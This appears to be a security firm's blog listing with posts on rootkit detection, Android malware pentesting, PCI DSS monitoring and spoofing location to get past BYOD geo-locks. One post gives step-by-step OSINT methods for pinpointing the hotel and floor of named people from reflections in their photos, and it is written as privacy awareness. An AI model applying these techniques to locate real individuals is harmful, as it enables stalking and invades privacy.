I’ll  be at DefCon22 a to present information about a high assurance tool/technique that helps to detect hidden processes (hidden by a DKOM type rootkit).  It works very well with little bit testing required (not very “abortable” http://takahiroharuyama.github.io/blog/2014/04/21/memory-forensics-still-aborted/). The process  also works recursively (detect host and guest processes inside a host memory dump).
Plus, I will also be at our IOAsis (http://ioasislasvegas.eventbrite.com/?aff=PRIOASIS) , so come through for a discussion and a demo.
PRESENTATION | June 16, 2014

Video: Building Custom Android Malware for Penetration Testing

By Robert Erbes  @rr_dot 
 
In this presentation, I provide a brief overview of the Android environment and a somewhat philosophical discussion of malware. I also take look at possible Android attacks in order to help you pentest your organization’s defenses against the increasingly common Bring Your Own Device scenario.

INSIGHTS | May 7, 2014

Glass Reflections in Pictures + OSINT = More Accurate Location

By Alejandro Hernández – @nitr0usmx

Disclaimer: The aim of this article is to help people to be more careful when taking pictures through windows because they might reveal their location inadvertently. The technique presented here might be used for many different purposes, such as to track down the location of the bad guys, to simply know in which hotel is that nice room or by some people, to follow the tracks of their favorite artist.
All of the pictures presented here were posted by the owners on Twitter. The tools and information used to determine the locations where the pictures were taken are all publically available on the Internet. No illegal actions were performed in the work presented here. 

 
 
Introduction
Travelling can be enriching and inspiring, especially if you’re in a place you haven’t been before. Whether on vacation or travelling for business, one of the first things that people usually do, including myself, after arriving in their hotel room, is turn on the lights (even if daylight is still coming through the windows), jump on the bed to feel how comfortable it is, walk to the window, and admire the view. If you like what you see, sometimes you grab your camera and take a picture, regardless of reflections in the window.
Without considering geolocation metadata [1] (if enabled), reflections could be a way to get more accurate information about where a picture was taken. How could one of glass’ optical properties [2], reflection, disclose your location? Continue reading.
Of course pictures taken from windows disclose location information such as the city and/or streets; however, people don’t always disclose the specific name of the place they’re standing. Here is where reflections could be useful.
Sometimes, not all of the time, but sometimes, reflections contain recognizable elements that with a little extra help, such as OSINT (Open Source Intelligence) [3], could reveal a more accurate location. The OSINT elements that I used include:
       Google Earth 3D Buildings (http://www.google.com/earth/)
       Google Maps (and Street View) (http://maps.google.com)
       Emporis (buildings information) (http://www.emporis.com)
       SkyscraperPage (buildings information) (http://skyscraperpage.com)
       Foursquare (pictures uploaded by people) (http://foursquare.com)
       TripAdvisor (pictures uploaded by people) (http://www.tripadvisor.com)
       Hotels’ Websites
       Google.com
In the following case studies, I’ll present step-by-step instructions for how to get more accurate information about where a picture was taken using reflections.
CASE #1 – Miami, FL
Searching for “hotel view” pictures on Twitter, I found this one from Scott Hoying (a member of Pentatonix, an a cappella group of five vocalists):
 
Looking at his previous tweet:
 
 We know he was in Miami, but, where exactly? Whether or not you’ve been to Miami, it’s difficult to recognize the buildings outside the window:
 
 So, I went to Wikipedia to get the name of every member of the band:
I looked for them on Twitter and Instagram. Only one other member had published a picture from what appeared to be the same hotel:
I was relatively easy to find that view with Google Earth:
However, from that perspective, there are three hotels:
So, it’s time to focus on the reflection elements present in the picture (same element reflected in different angles and the portraits) as well as the pattern in the bed cover:
Two great resources for reference pictures, in addition to hotels’ websites, are Foursquare and TripAdvisor (some people like to show where they’re staying). So, after a couple of minutes analyzing pictures of the three possible hotels, I finally found our reflected elements in pictures uploaded by people and on the hotel’s website itself:
After some minutes, we can conclude that the band stayed at the Epic Hotel and, perhaps, in a Water View suite:
 
 
CASE #2 – Vancouver, Canada
The following picture was posted by a friend of mine with the comment that she was ready for her talk at #XXXX2014 conference in #Vancouver. The easiest way to get her location would have been to look for the list of partnering hotels for speakers at XXXX2014 conference, but what if the name of the conference hadn’t been available?
Let’s take the longer but more interesting path, starting with only the knowledge that this picture was taken in Vancouver:
The square lamp reflected is pretty clear, isn’t it? ;-). First, let’s find that building in front. For that, you could go straight to Google Earth with the 3D buildings layout enabled, but I preferred to dive into Vancouver’s pictures in Emporis:
We’ve found it’s the Convention Centre (and its exact location evidently). Now, it’s easy to match the perspective from which the picture was taken using Google Earth’s 3D buildings layout:
We see it, but, where are we standing? Another useful OSINT resource I used was the SkyscraperPage of Vancouver, which shows us two options:
 
By clicking on each mark we can see more detailed information. According to this website, the one on the right is used only for offices and retail, but not for lodging: 
However, the other one seems to be our building:
A quick search leads us to the Fairmont Pacific Rim’s Website, where it’s easy to find pictures from inside the hotel:
The virtual tour for the Deluxe Room has exactly the same view:
Turn our virtual head to the left… and voilà, our square lamp:
Now, let’s find out how high up it is to where the picture was taken. Let’s view our hotel from the Convention Center’s perspective and estimate the floor:
From my perspective, it appears to be between the 17th and 20th floor, so I asked the person who took the picture to corroborate:
 
CASE #3 – Des Moines, IA – 1
An easy one, there are not many tall buildings in Des Moines, Iowa, so it was sort of easy to spot this one:
It seems that the building in front is a parking garage. The drapes look narrow and are white / pearl color. The fans on the rooftop were easy to locate on Google Maps:
And we could corroborate using the Street View feature:
We found it was the Des Moines Marriott Downtown. Looking for pictures on TripAdvisor we’ve found what it seems to be the same drapery:
Which floor? Let’s move our head and look towards the window where the picture was taken:
The 3D model also helps:
And… almost!
CASE #4 – Des Moines, IA – 2
Another easy case from the same hotel as the previous case. Look at the detailed reflections: the beds, the portraits, the TV, etc.
These were easy-to-spot elements using Foursquare and TripAdvisor:
Misc. Ideas / Further Research
While brainstorming with my friend Diego Madero about reflections, he suggested going deeper by including image processing to separate the reflections from the original picture. It’s definitely a good idea; however, it takes time to do this (as far as I know).
We also discussed the idea that you could use the information disclosed in reflections to develop a profile of an individual. For example, if the person called room service (plates and bottles reflected), what brand of laptop they are using (logo reflected), or whether they are storing something in the safe (if it’s closed or there’s an indicator like an LED perhaps).
Conclusion
Clear and simple: the reflected images in pictures might disclose information that you wouldn’t be willing to share, such as your location or other personal details. If you don’t want to disclose your location, eliminate reflections by choosing a better angle or simply turning off all of the lights inside the room (including the TV) before taking the picture.
Also, it’s evident that reflections are not only present in windows. While I only considered reflections in windows from different hotels, other things can reflect the surrounding environment:
       “44 Impressive Examples of Reflection Photography”
Finally, do not forget that a reflection could be your enemy.
Recommendations
Here are some other useful links:
       “How to Eliminate Reflections in Glasses in Portraits”
       “How to remove the glare and brightness in an image (Image preprocessing)”
Thanks for reading.
References:
[1] “Geolocation”
[2] “Glass – Optical Properties”
[3] “OSINT – Open Source Intelligence”
INSIGHTS | February 19, 2014

PCI DSS and Security Breaches

Every time an organization suffers a security breach and cardholder data is compromised, people question the effectiveness of the Payment Card Industry Data Security Standard (PCI DSS). Blaming PCI DSS for the handful of companies that are breached every year shows a lack of understanding of the standard’s role. 
Two major misconceptions are responsible for this.
 
First, PCI DSS is a compliance standard. An organization can be compliant today and not tomorrow. It can be compliant when an assessment is taking place and noncompliant the minute the assessment is completed.
Unfortunately, some organizations don’t see PCI DSS as a standard that applies to their day-to-day operations; they think of it as a single event that they must pass at all costs. Each year, they desperately prepare for their assessment and struggle to remediate the assessor’s findings before their annual deadline. When they finally receive their attestation, they check out and don’t think about PCI DSS compliance until next year, when the whole process starts again. 
 
Their information security management system is immature, ad-hoc, perhaps even chaotic, and driven by the threat of losing a certificate or being fined by their processor.
 
To use an analogy, PCI DSS compliance is not a race to a destination, but how consistently well you drive to that destination. Many organizations accelerate from zero to sixty in seconds, braking abruptly, and starting all over again a month later. The number of security breaches will be reduced as soon as organizations and assessors both understand that a successful compliance program is not a single state, but an ongoing process. As such, an organization that has a mature and repeatable process will be compliant continuously with rare exceptions and not only during the time of the assessment.
 
Second, in the age of Advanced Persistent Threats (APTs), the challenge for most organizations it is not whether they can successfully prevent an attack from ever occurring, but how quickly they can become aware that a breach has actually occurred.
 
PCI DSS requirements can be classified into three categories:  
 
1. Requirements intended to prevent an incident from happening in the first place. 
These requirements include implementing network access controls, configuring systems securely, applying periodic security updates, performing periodic security reviews, developing secure applications, providing security awareness to the staff, and so on. 
 

2. Requirements designed to detect malicious activities.
These requirements involve implementing solutions such as antivirus software, intrusion detection systems, and file integrity monitoring.


3. Requirements designed to ensure that if a security breach occurs, actions are taken to respond to and contain the security breach, and ensure evidence will exist to identify and prosecute the attackers.

 
Too many organizations focus their compliance resources on the first group of requirements. They give the second and third groups as little attention as possible. 
 
This is painfully obvious. According to the Verizon Data Breach Investigation Report (DBIR) and public information available for the most recent company breaches, most organizations become aware of a security breach many weeks or even months after the initial compromise, and only when notified by the payment card brands or law enforcement. This confirms a clear reality. Breached organizations do not have the proper tools and/or qualified staff to monitor their security events and logs. 
 
Once all the preventive and detective security controls required by PCI DSS have been properly implemented, the only thing left for an organization is to thoroughly monitor logs and events. The goal is to detect anomalies and take any necessary actions as soon as possible.
 
Having sharp individuals in this role is critical for any organization. The smarter the individuals doing the monitoring are, the less opportunity attackers have to get to your data before they are discovered. 
 
You cannot avoid getting hacked. Sooner or later, to a greater or lesser degree, it will happen. What you can really do is monitor and investigate continuously.
 

 

In PCI DSS compliance, monitoring is where companies are really failing.
INSIGHTS | May 7, 2013

Bypassing Geo-locked BYOD Applications

In the wake of increasingly lenient BYOD policies within large corporations, there’s been a growing emphasis upon restricting access to business applications (and data) to specific geographic locations. Over the last 18 months more than a dozen start-ups in North America alone have sprung up seeking to offer novel security solutions in this space – essentially looking to provide mechanisms for locking application usage to a specific location or distance from an office, and ensuring that key data or functionality becomes inaccessible outside these prescribed zones.
These “Geo-locking” technologies are in hot demand as organizations try desperately to regain control of their networks, applications and data.

Over the past 9 months I’ve been asked by clients and potential investors alike for advice on the various technologies and the companies behind them. There’s quite a spectrum of available options in the geo-locking space; each start-up has a different take on the situation and has proposed (or developed) a unique way in tackling the problem. Unfortunately, in the race to secure a position in this evolving security market, much of the literature being thrust at potential customers is heavy in FUD and light in technical detail.
It may be because marketing departments are riding roughshod over the technical folks in order to establish these new companies, but in several of the solutions being proposed I’ve had concerns over the scope of the security element being offered. It’s not because the approaches being marketed aren’t useful or won’t work, it’s more because they’ve defined the problem they’re aiming to solve so narrowly that they’ve developed what I could only describe as tunnel-vision to the spectrum of threat organizations are likely to face in the BYOD realm.
In the meantime I wanted to offer this quick primer on the evolving security space that has become BYOD geo-locking.
Geo-locking BYOD
The general premise behind the current generation of geo-locking technologies is that each BYOD gadget will connect wirelessly to the corporate network and interface with critical applications. When the device is moved away from the location, those applications and data should no longer be accessible.
There are a number of approaches, but the most popular strategies can be categorized as follows:
  1. Thick-client – A full-featured application is downloaded to the BYOD gadget and typically monitors physical location elements using telemetry from GPS or the wireless carrier directly. If the location isn’t “approved” the application prevents access to any data stored locally on the device.
  2. Thin-client – a small application or driver is installed on the BYOD gadget to interface with the operating system and retrieve location information (e.g. GPS position, wireless carrier information, IP address, etc.). This application then incorporates this location information in to requests to access applications or data stored on remote systems – either through another on-device application or over a Web interface.
  3. Share-my-location – Many mobile operating systems include opt-in functionality to “share my location” via their built-in web browser. Embedded within the page request is a short geo-location description.
  4. Signal proximity – The downloaded application or driver will only interface with remote systems and data if the wireless channel being connected to by the device is approved. This is typically tied to WiFi and nanocell routers with unique identifiers and has a maximum range limited to the power of the transmitter (e.g. 50-100 meters).

The critical problem with the first three geo-locking techniques can be summed up simply as “any device can be made to lie about its location”.

The majority of start-ups have simply assumed that the geo-location information coming from the device is correct – and have not included any means of securing the integrity of that device’s location information. A few have even tried to tell customers (and investors) that it’s impossible for a device to lie about its GPS location or a location calculated off cell-tower triangulation. I suppose it should not be a surprise though – we’ve spent two decades trying to educate Web application developers to not trust client-side input validation and yet they still fall for web browser manipulations.
A quick search for “fake location” on the Apple and Android stores will reveal the prevalence and accessibility of GPS fakery. Any other data being reported from the gadget – IP address, network MAC address, cell-tower connectivity, etc. – can similarly be manipulated. In addition to manipulation of the BYOD gadget directly, alternative vectors that make use of private VPNs and local network jump points may be sufficient to bypass thin-client and “share-my-location” geo-locking application approaches.
That doesn’t mean that these geo-locking technologies should be considered unicorn pelts, but it does mean that organization’s seeking to deploy these technologies need to invest some time in determining the category of threat (and opponent) they’re prepared to combat.
If the worst case scenario is of a nurse losing a hospital iPad and that an inept thief may try to access patient records from another part of the city, then many of the geo-locking approaches will work quite well. However, if the scenario is that of a tech-savvy reporter paying the nurse to access the hospital iPad and is prepared in install a few small applications that manipulate the geo-location information in order to remotely access celebrity patient records… well, then you’ll need a different class of defense.
Given the rapid evolution of BYOD geo-locking applications and the number of new businesses offering security solutions in this space, my advice is two-fold – determine the worst case scenarios you’re trying to protect against, and thoroughly assess the technology prior to investment. Don’t be surprised if the marketing claims being made by many of these start-ups are a generation or two ahead of what the product is capable of performing today.
Having already assessed or reviewed the approaches of several start-ups in this particular BYOD security realm, I believe some degree of skepticism and caution is warranted.
— Gunter Ollmann, CTO IOActive